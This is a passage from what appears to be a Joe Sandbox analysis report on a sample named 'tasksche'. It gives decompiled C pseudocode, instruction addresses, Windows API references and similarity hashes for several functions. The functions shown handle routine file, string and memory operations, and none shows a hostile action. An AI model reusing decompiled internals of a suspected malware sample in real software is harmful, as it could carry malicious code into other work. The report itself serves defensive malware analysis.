                                                                                              0x004016f0
                                                                                              0x004016f6
                                                                                              0x004016fc
                                                                                              0x004016fc
                                                                                              0x004016fc
                                                                                              0x00401700
                                                                                              0x0040170e
                                                                                              0x0040171a
                                                                                              0x00401720
                                                                                              0x00401726
                                                                                              0x0040172e
                                                                                              0x00401731
                                                                                              0x00401731
                                                                                              0x00401738
                                                                                              0x00401743
                                                                                              0x00401747
                                                                                              0x0040174e
                                                                                              0x00401755
                                                                                              0x00401755
                                                                                              0x00401757
                                                                                              0x00000000
                                                                                              0x00401757
                                                                                              0x0040173a
                                                                                              0x00401741
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401741
                                                                                              0x004016e0
                                                                                              0x004016e7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004016eb
                                                                                              0x00000000
                                                                                              0x004016eb
                                                                                              0x004016be
                                                                                              0x004016c1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004016c3
                                                                                              0x004016c5
                                                                                              0x00000000
                                                                                              0x004016c5
                                                                                              0x00401698
                                                                                              0x0040169f
                                                                                              0x004016af
                                                                                              0x004016af
                                                                                              0x004016af
                                                                                              0x004016b1
                                                                                              0x004016b1
                                                                                              0x00000000
                                                                                              0x004016b1
                                                                                              0x004016a1
                                                                                              0x004016a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004016ac
                                                                                              0x00000000
                                                                                              0x004016ac
                                                                                              0x00000000
                                                                                              0x004016d5
                                                                                              0x00401647
                                                                                              0x0040164e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040164e
                                                                                              0x00401620
                                                                                              0x00401625
                                                                                              0x00401629
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040162b
                                                                                              0x0040162b
                                                                                              0x00000000
                                                                                              0x0040162b
                                                                                              0x00401604
                                                                                              0x00401608
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401608
                                                                                              0x004015a7
                                                                                              0x004015b0
                                                                                              0x004015b3
                                                                                              0x004015b6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004015b8
                                                                                              0x00000000
                                                                                              0x004015b8
                                                                                              0x00401594
                                                                                              0x00000000
                                                                                              0x00401594
                                                                                              0x00401449
                                                                                              0x00401449
                                                                                              0x00401758
                                                                                              0x0040175d
                                                                                              0x00401765
                                                                                              0x00401765

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: af860968fb5a352ec115184650dafa7935731a9a847d0e8dc47d2517750fbf99
                                                                                              • Instruction ID: 1df30631c7f2331ab9bb659be56b51083ca38efb3ea41a431c6c341c2f7f2518
                                                                                              • Opcode Fuzzy Hash: af860968fb5a352ec115184650dafa7935731a9a847d0e8dc47d2517750fbf99
                                                                                              • Instruction Fuzzy Hash: D7A1A370904B44AFDB31DB38C8447ABB7E5AB45304F14482FE4A7A72E1D779A881CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00408923(void* __ecx, WCHAR* _a4, long _a8) {
                                                                                              				long _v8;
                                                                                              				short _v4104;
                                                                                              				signed char _t38;
                                                                                              				signed int _t42;
                                                                                              				void* _t51;
                                                                                              				signed char _t54;
                                                                                              				char _t60;
                                                                                              				void* _t64;
                                                                                              
                                                                                              				E0041AAF0(0x1004);
                                                                                              				_t64 = __ecx;
                                                                                              				_t54 = _a8;
                                                                                              				_t38 = _t54 >> 0x00000001 & 0x00000001;
                                                                                              				if((_t54 & 0x00000010) != 0 ||  *((intOrPtr*)(__ecx + 0x1c)) != 0) {
                                                                                              					_t60 = 1;
                                                                                              				} else {
                                                                                              					_t60 = 0;
                                                                                              				}
                                                                                              				 *(_t64 + 0x18) = _t54;
                                                                                              				_v8 = ((0 | _t38 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
                                                                                              				_a8 = 0 | _t60 != 0x00000000;
                                                                                              				_t42 =  *(E0040A08A(_t60, _a4)) & 0x0000ffff;
                                                                                              				if(_t42 == 0x2e || _t42 == 0x20) {
                                                                                              					 *(_t64 + 4) =  *(_t64 + 4) | 0xffffffff;
                                                                                              				} else {
                                                                                              					_t51 = CreateFileW(_a4, _v8, _a8, 0, 2, 0, 0); // executed
                                                                                              					 *(_t64 + 4) = _t51;
                                                                                              				}
                                                                                              				if( *(_t64 + 4) == 0xffffffff && E0040A3DC(_a4,  &_v4104, 0x800) != 0) {
                                                                                              					 *(_t64 + 4) = CreateFileW( &_v4104, _v8, _a8, 0, 2, 0, 0);
                                                                                              				}
                                                                                              				 *((char*)(_t64 + 0x12)) = 1;
                                                                                              				 *((intOrPtr*)(_t64 + 0xc)) = 0;
                                                                                              				 *((char*)(_t64 + 0x10)) = 0;
                                                                                              				E00410B9C(_t64 + 0x1e, _a4, 0x800);
                                                                                              				return 0 |  *(_t64 + 4) != 0xffffffff;
                                                                                              			}











                                                                                              0x0040892b
                                                                                              0x00408932
                                                                                              0x00408934
                                                                                              0x0040893b
                                                                                              0x00408943
                                                                                              0x0040894e
                                                                                              0x0040894a
                                                                                              0x0040894a
                                                                                              0x0040894a
                                                                                              0x00408953
                                                                                              0x00408971
                                                                                              0x00408974
                                                                                              0x0040897c
                                                                                              0x00408989
                                                                                              0x00408991
                                                                                              0x00408997
                                                                                              0x004089a5
                                                                                              0x004089a7
                                                                                              0x004089a7
                                                                                              0x004089ae
                                                                                              0x004089dc
                                                                                              0x004089dc
                                                                                              0x004089eb
                                                                                              0x004089ef
                                                                                              0x004089f2
                                                                                              0x004089f5
                                                                                              0x00408a07

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,?,?,-00000011,?,00408777,?,-00000011,?), ref: 004089A5
                                                                                              • CreateFileW.KERNEL32(?,000000FF,?,00000000,00000002,00000000,00000000,?,?,00000800,?,?,?,-00000011,?,00408777), ref: 004089DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: a074d9b34406725a99dd7798f6dc6781e4ed09d04832e0e73d262d8c08033346
                                                                                              • Instruction ID: 01d84b190ee352a3a297c1effa4f932d2cea621e1ee0f9c6dc0f58f94aa457de
                                                                                              • Opcode Fuzzy Hash: a074d9b34406725a99dd7798f6dc6781e4ed09d04832e0e73d262d8c08033346
                                                                                              • Instruction Fuzzy Hash: F621E6B1000709AFDB20AF28CD41AEA7BA9EB04324F00853EF5D5972D1CA799D859B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 81%
                                                                                              			E004012EA(void* __ecx, void* __edi) {
                                                                                              				void* __ebx;
                                                                                              				void* __esi;
                                                                                              				void* _t30;
                                                                                              				void* _t37;
                                                                                              				void* _t55;
                                                                                              				unsigned int _t57;
                                                                                              				void* _t58;
                                                                                              				signed int _t59;
                                                                                              				intOrPtr* _t62;
                                                                                              				void* _t64;
                                                                                              
                                                                                              				E0041A4DC(E004294DA, _t64);
                                                                                              				_t44 = __ecx;
                                                                                              				 *(_t64 - 0x1c) = 0;
                                                                                              				 *(_t64 - 0x18) = 0;
                                                                                              				 *((intOrPtr*)(_t64 - 0x14)) = 0;
                                                                                              				 *((intOrPtr*)(_t64 - 0x10)) = 0;
                                                                                              				_push(0);
                                                                                              				_push(_t64 - 0x1c);
                                                                                              				 *((intOrPtr*)(_t64 - 4)) = 0;
                                                                                              				_t30 = E00402C8B(__ecx, _t55); // executed
                                                                                              				if(_t30 != 0) {
                                                                                              					_push(__edi);
                                                                                              					_t57 =  *(_t64 - 0x18);
                                                                                              					E004012B5(_t64 - 0x1c, 0);
                                                                                              					_t62 =  *((intOrPtr*)(_t64 + 8));
                                                                                              					_t48 = _t62;
                                                                                              					E004012D0(_t62, _t57 + 1);
                                                                                              					__eflags =  *((intOrPtr*)(__ecx + 0xb050)) - 3;
                                                                                              					if( *((intOrPtr*)(__ecx + 0xb050)) != 3) {
                                                                                              						__eflags =  *(__ecx + 0x8944) & 0x00000001;
                                                                                              						if(( *(__ecx + 0x8944) & 0x00000001) == 0) {
                                                                                              							E00411B3C( *(_t64 - 0x1c),  *_t62,  *((intOrPtr*)(_t62 + 4)));
                                                                                              						} else {
                                                                                              							_t59 = _t57 >> 1;
                                                                                              							E00411BA7( *(_t64 - 0x1c),  *_t62, _t59);
                                                                                              							 *((short*)( *_t62 + _t59 * 2)) = 0;
                                                                                              						}
                                                                                              					} else {
                                                                                              						E00411CD1(_t48,  *(_t64 - 0x1c),  *_t62,  *((intOrPtr*)(_t62 + 4)));
                                                                                              					}
                                                                                              					E004012D0(_t62, E0041A7AF( *_t62));
                                                                                              					__eflags =  *(_t64 - 0x1c);
                                                                                              					_pop(_t58);
                                                                                              					if(__eflags != 0) {
                                                                                              						_push( *(_t64 - 0x1c));
                                                                                              						E0041A506(_t44, _t58, _t62, __eflags);
                                                                                              					}
                                                                                              					_t37 = 1;
                                                                                              				} else {
                                                                                              					_t70 =  *(_t64 - 0x1c);
                                                                                              					if( *(_t64 - 0x1c) != 0) {
                                                                                              						_push( *(_t64 - 0x1c));
                                                                                              						E0041A506(__ecx, __edi, 0, _t70);
                                                                                              					}
                                                                                              					_t37 = 0;
                                                                                              				}
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
                                                                                              				return _t37;
                                                                                              			}













                                                                                              0x004012ef
                                                                                              0x004012fb
                                                                                              0x004012fd
                                                                                              0x00401300
                                                                                              0x00401303
                                                                                              0x00401306
                                                                                              0x00401309
                                                                                              0x0040130d
                                                                                              0x0040130e
                                                                                              0x00401311
                                                                                              0x00401318
                                                                                              0x0040132f
                                                                                              0x00401330
                                                                                              0x00401337
                                                                                              0x0040133c
                                                                                              0x00401343
                                                                                              0x00401345
                                                                                              0x0040134a
                                                                                              0x00401351
                                                                                              0x00401362
                                                                                              0x00401369
                                                                                              0x0040138a
                                                                                              0x0040136b
                                                                                              0x0040136b
                                                                                              0x00401373
                                                                                              0x0040137c
                                                                                              0x0040137c
                                                                                              0x00401353
                                                                                              0x0040135b
                                                                                              0x0040135b
                                                                                              0x0040139a
                                                                                              0x0040139f
                                                                                              0x004013a3
                                                                                              0x004013a4
                                                                                              0x004013a6
                                                                                              0x004013a9
                                                                                              0x004013ae
                                                                                              0x004013af
                                                                                              0x0040131a
                                                                                              0x0040131a
                                                                                              0x0040131d
                                                                                              0x0040131f
                                                                                              0x00401322
                                                                                              0x00401327
                                                                                              0x00401328
                                                                                              0x00401328
                                                                                              0x004013b6
                                                                                              0x004013be

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 004012EF
                                                                                                • Part of subcall function 00402C8B: __EH_prolog.LIBCMT ref: 00402C90
                                                                                              • _wcslen.LIBCMT ref: 00401391
                                                                                                • Part of subcall function 0041A506: __lock.LIBCMT ref: 0041A524
                                                                                                • Part of subcall function 0041A506: ___sbh_find_block.LIBCMT ref: 0041A52F
                                                                                                • Part of subcall function 0041A506: ___sbh_free_block.LIBCMT ref: 0041A53E
                                                                                                • Part of subcall function 0041A506: RtlFreeHeap.NTDLL(00000000,00000000,0042D658,0000000C,0041EF84,00000000,0042D930,0000000C,0041EFBE,00000000,0041A9AB,?,00425448,00000004,0042DB18,0000000C), ref: 0041A56E
                                                                                                • Part of subcall function 0041A506: GetLastError.KERNEL32(?,00425448,00000004,0042DB18,0000000C,0042133E,00000000,0041A9BA,00000000,00000000,00000000,?,0041E966,00000001,00000214), ref: 0041A57F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2367413355-0
                                                                                              • Opcode ID: 2919600df76e4d66bc5d6f82fae5af35264ca928e1590e53ce8e638c26dbddb5
                                                                                              • Instruction ID: 0a298500d8bcfa7ff7c3c7c798daa7998fe1fc2396f24876ea38c2992963b511
                                                                                              • Opcode Fuzzy Hash: 2919600df76e4d66bc5d6f82fae5af35264ca928e1590e53ce8e638c26dbddb5
                                                                                              • Instruction Fuzzy Hash: 43218131C04219AADF11AF95D8019EFBBBAEF44704F10402FF815B26B1D7791951DB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E0040E75F(void* __ecx, void* __edx, void* __eflags) {
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* _t33;
                                                                                              				void* _t34;
                                                                                              				intOrPtr _t36;
                                                                                              				intOrPtr _t38;
                                                                                              				intOrPtr _t55;
                                                                                              				void* _t57;
                                                                                              				void* _t59;
                                                                                              				intOrPtr _t61;
                                                                                              				void* _t64;
                                                                                              
                                                                                              				_t64 = __eflags;
                                                                                              				_t54 = __edx;
                                                                                              				E0041A4DC(E004297B1, _t59);
                                                                                              				_push(__ecx);
                                                                                              				E0041AAF0(0xc0b0);
                                                                                              				_push(_t57);
                                                                                              				_push(_t55);
                                                                                              				 *((intOrPtr*)(_t59 - 0x10)) = _t61;
                                                                                              				 *((intOrPtr*)(_t59 - 4)) = 0;
                                                                                              				E00401822(_t59 - 0xc0c0, __edx, _t55, _t64, 0); // executed
                                                                                              				 *((char*)(_t59 - 4)) = 1;
                                                                                              				E00401A1A(_t59 - 0xc0c0, __edx, _t59, _t64,  *((intOrPtr*)(_t59 + 0xc)));
                                                                                              				 *((intOrPtr*)(_t59 - 0x20)) = 0;
                                                                                              				 *((intOrPtr*)(_t59 - 0x1c)) = 0;
                                                                                              				 *((intOrPtr*)(_t59 - 0x18)) = 0;
                                                                                              				 *((intOrPtr*)(_t59 - 0x14)) = 0;
                                                                                              				 *((char*)(_t59 - 4)) = 2;
                                                                                              				_t33 = E00401768(_t59 - 0xc0c0, _t54, _t59 - 0x20); // executed
                                                                                              				if(_t33 != 0) {
                                                                                              					_t36 =  *((intOrPtr*)(_t59 - 0x1c));
                                                                                              					_t57 = _t36 + _t36;
                                                                                              					_t55 = _t36;
                                                                                              					_t38 = E0041CF3E(0, _t54, _t55, _t57 + 2);
                                                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x10)))) = _t38;
                                                                                              					if(_t38 != 0) {
                                                                                              						__eflags = 0;
                                                                                              						 *((short*)(_t57 + _t38)) = 0;
                                                                                              						E0041C290(0, _t55, _t57, _t38,  *((intOrPtr*)(_t59 - 0x20)), _t57);
                                                                                              					} else {
                                                                                              						_t55 = 0;
                                                                                              					}
                                                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x14)))) = _t55;
                                                                                              				}
                                                                                              				_t67 =  *((intOrPtr*)(_t59 - 0x20));
                                                                                              				if( *((intOrPtr*)(_t59 - 0x20)) != 0) {
                                                                                              					_push( *((intOrPtr*)(_t59 - 0x20)));
                                                                                              					E0041A506(0, _t55, _t57, _t67);
                                                                                              				}
                                                                                              				 *((char*)(_t59 - 4)) = 0;
                                                                                              				_t34 = E00401228(_t59 - 0xc0c0, _t55);
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
                                                                                              				return _t34;
                                                                                              			}















                                                                                              0x0040e75f
                                                                                              0x0040e75f
                                                                                              0x0040e764
                                                                                              0x0040e769
                                                                                              0x0040e76f
                                                                                              0x0040e775
                                                                                              0x0040e776
                                                                                              0x0040e779
                                                                                              0x0040e783
                                                                                              0x0040e786
                                                                                              0x0040e794
                                                                                              0x0040e798
                                                                                              0x0040e79d
                                                                                              0x0040e7a0
                                                                                              0x0040e7a3
                                                                                              0x0040e7a6
                                                                                              0x0040e7b3
                                                                                              0x0040e7b7
                                                                                              0x0040e7be
                                                                                              0x0040e7c0
                                                                                              0x0040e7c3
                                                                                              0x0040e7c6
                                                                                              0x0040e7cc
                                                                                              0x0040e7d5
                                                                                              0x0040e7d9
                                                                                              0x0040e7df
                                                                                              0x0040e7e2
                                                                                              0x0040e7ea
                                                                                              0x0040e7db
                                                                                              0x0040e7db
                                                                                              0x0040e7db
                                                                                              0x0040e7f5
                                                                                              0x0040e7f5
                                                                                              0x0040e7f7
                                                                                              0x0040e7fa
                                                                                              0x0040e7fc
                                                                                              0x0040e7ff
                                                                                              0x0040e804
                                                                                              0x0040e80b
                                                                                              0x0040e80e
                                                                                              0x0040e818
                                                                                              0x0040e821

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0040E764
                                                                                                • Part of subcall function 00401822: __EH_prolog.LIBCMT ref: 00401827
                                                                                                • Part of subcall function 00401822: _memset.LIBCMT ref: 0040196A
                                                                                                • Part of subcall function 00401822: _memset.LIBCMT ref: 00401979
                                                                                                • Part of subcall function 00401822: _memset.LIBCMT ref: 00401988
                                                                                                • Part of subcall function 00401768: __EH_prolog.LIBCMT ref: 0040176D
                                                                                              • _malloc.LIBCMT ref: 0040E7CC
                                                                                                • Part of subcall function 0041CF3E: __FF_MSGBANNER.LIBCMT ref: 0041CF61
                                                                                                • Part of subcall function 0041CF3E: __NMSG_WRITE.LIBCMT ref: 0041CF68
                                                                                                • Part of subcall function 0041CF3E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004212F4,00000000,00000001,00000000,?,0041EF2D,00000018,0042D930,0000000C,0041EFBE), ref: 0041CFB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_memset$AllocateHeap_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 47157355-0
                                                                                              • Opcode ID: 76dc919e38105a2a0c7a25f94b1f982589f1f165098df706c37864f55c56c04a
                                                                                              • Instruction ID: 028989472a53044f7525bc0779393b56fb6d8ddec0b6eee1d5d0b7402cf9aefd
                                                                                              • Opcode Fuzzy Hash: 76dc919e38105a2a0c7a25f94b1f982589f1f165098df706c37864f55c56c04a
                                                                                              • Instruction Fuzzy Hash: 09217F72800259EFCF15EFA5D8819EEB7B4BF08308F10456FE006B3291E7385A44DB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E00408BAE(void* __ecx, signed int __edx) {
                                                                                              				long _v8;
                                                                                              				long _t10;
                                                                                              				signed int _t13;
                                                                                              				signed int _t26;
                                                                                              				long _t29;
                                                                                              				void* _t32;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t32 = __ecx;
                                                                                              				_t26 = __edx | 0xffffffff;
                                                                                              				if( *((intOrPtr*)(__ecx + 4)) != _t26) {
                                                                                              					L3:
                                                                                              					_v8 = 0;
                                                                                              					_t10 = SetFilePointer( *(_t32 + 4), 0,  &_v8, 1); // executed
                                                                                              					_t29 = _t10;
                                                                                              					if(_t29 != 0xffffffff || GetLastError() == 0) {
                                                                                              						L7:
                                                                                              						asm("cdq");
                                                                                              						_t13 = E0041ABD0(_v8, _t26, 0, 1) + _t29;
                                                                                              						asm("adc edx, ecx");
                                                                                              					} else {
                                                                                              						if( *((intOrPtr*)(_t32 + 0x14)) == 0) {
                                                                                              							_t13 = _t26 | 0xffffffff;
                                                                                              						} else {
                                                                                              							E00406402(0x4335ac, _t32 + 0x1e);
                                                                                              							goto L7;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
                                                                                              						_t13 = _t26;
                                                                                              					} else {
                                                                                              						E00406402(0x4335ac, __ecx + 0x1e);
                                                                                              						goto L3;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t13;
                                                                                              			}









                                                                                              0x00408bb1
                                                                                              0x00408bb4
                                                                                              0x00408bb6
                                                                                              0x00408bbe
                                                                                              0x00408bd3
                                                                                              0x00408bde
                                                                                              0x00408be1
                                                                                              0x00408be7
                                                                                              0x00408bec
                                                                                              0x00408c0b
                                                                                              0x00408c10
                                                                                              0x00408c1b
                                                                                              0x00408c1d
                                                                                              0x00408bf8
                                                                                              0x00408bfb
                                                                                              0x00408c2b
                                                                                              0x00408bfd
                                                                                              0x00408c06
                                                                                              0x00000000
                                                                                              0x00408c06
                                                                                              0x00408bfb
                                                                                              0x00408bc0
                                                                                              0x00408bc3
                                                                                              0x00408c24
                                                                                              0x00408bc5
                                                                                              0x00408bce
                                                                                              0x00000000
                                                                                              0x00408bce
                                                                                              0x00408bc3
                                                                                              0x00408c23

                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,?,00000001), ref: 00408BE1
                                                                                              • GetLastError.KERNEL32(?,?), ref: 00408BEE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 401041f812e38b2c9cc7bc658f647880eeddc778264b755613b9ad4916800595
                                                                                              • Instruction ID: 02e03e75e993c9a8a945b97f90e28c3a97864ede8bf9f3e31abc9cd0b64ad5c5
                                                                                              • Opcode Fuzzy Hash: 401041f812e38b2c9cc7bc658f647880eeddc778264b755613b9ad4916800595
                                                                                              • Instruction Fuzzy Hash: 540145B2706204BFE7209B788D458AB36ADCB84334B14423FB192E33C1EA749D00527D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040C3BF(int _a4) {
                                                                                              				signed int _t3;
                                                                                              				signed int _t4;
                                                                                              				int _t12;
                                                                                              				WCHAR* _t22;
                                                                                              
                                                                                              				_t3 =  *0x4355d8; // 0x5
                                                                                              				_t4 = _t3 + 1;
                                                                                              				 *0x4355d8 = _t4;
                                                                                              				if(_t4 >= 8) {
                                                                                              					_t4 = 0;
                                                                                              					 *0x4355d8 = 0;
                                                                                              				}
                                                                                              				_t22 = (_t4 << 0xa) + 0x4335d8;
                                                                                              				 *_t22 = 0;
                                                                                              				if(E0040BB81(0x4335bc) != 0) {
                                                                                              					L4:
                                                                                              					LoadStringW( *0x4335a4, _a4, _t22, 0x200);
                                                                                              				} else {
                                                                                              					_t12 = LoadStringW( *0x4335a8, _a4, _t22, 0x200); // executed
                                                                                              					if(_t12 == 0) {
                                                                                              						goto L4;
                                                                                              					}
                                                                                              				}
                                                                                              				E0040BF1D(0x4335bc, _t22, _t22, 0x200, 0, 0);
                                                                                              				return _t22;
                                                                                              			}







                                                                                              0x0040c3bf
                                                                                              0x0040c3c4
                                                                                              0x0040c3c5
                                                                                              0x0040c3cd
                                                                                              0x0040c3cf
                                                                                              0x0040c3d1
                                                                                              0x0040c3d1
                                                                                              0x0040c3e1
                                                                                              0x0040c3ed
                                                                                              0x0040c402
                                                                                              0x0040c416
                                                                                              0x0040c422
                                                                                              0x0040c404
                                                                                              0x0040c410
                                                                                              0x0040c414
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040c414
                                                                                              0x0040c42d
                                                                                              0x0040c438

                                                                                              APIs
                                                                                              • LoadStringW.USER32(?,-004335D2,00000200), ref: 0040C410
                                                                                              • LoadStringW.USER32(?,-004335D2,00000200), ref: 0040C422
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: LoadString
                                                                                              • String ID:
                                                                                              • API String ID: 2948472770-0
                                                                                              • Opcode ID: 72945bf23e6ae9cf9b0fab0a5a9e43b8bd420b2efeca12c7a5d03f8341522d8c
                                                                                              • Instruction ID: edfc175873420c56a2918f30daf07abd917a54f8fc7c105ac48efc03a3cacc81
                                                                                              • Opcode Fuzzy Hash: 72945bf23e6ae9cf9b0fab0a5a9e43b8bd420b2efeca12c7a5d03f8341522d8c
                                                                                              • Instruction Fuzzy Hash: 200186722012107FD6209F19AC85F577BEDEB99351F10543AB900D32A1D6359C01876C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E00408F4B(intOrPtr* __ecx, long _a4, long _a8, signed int _a12) {
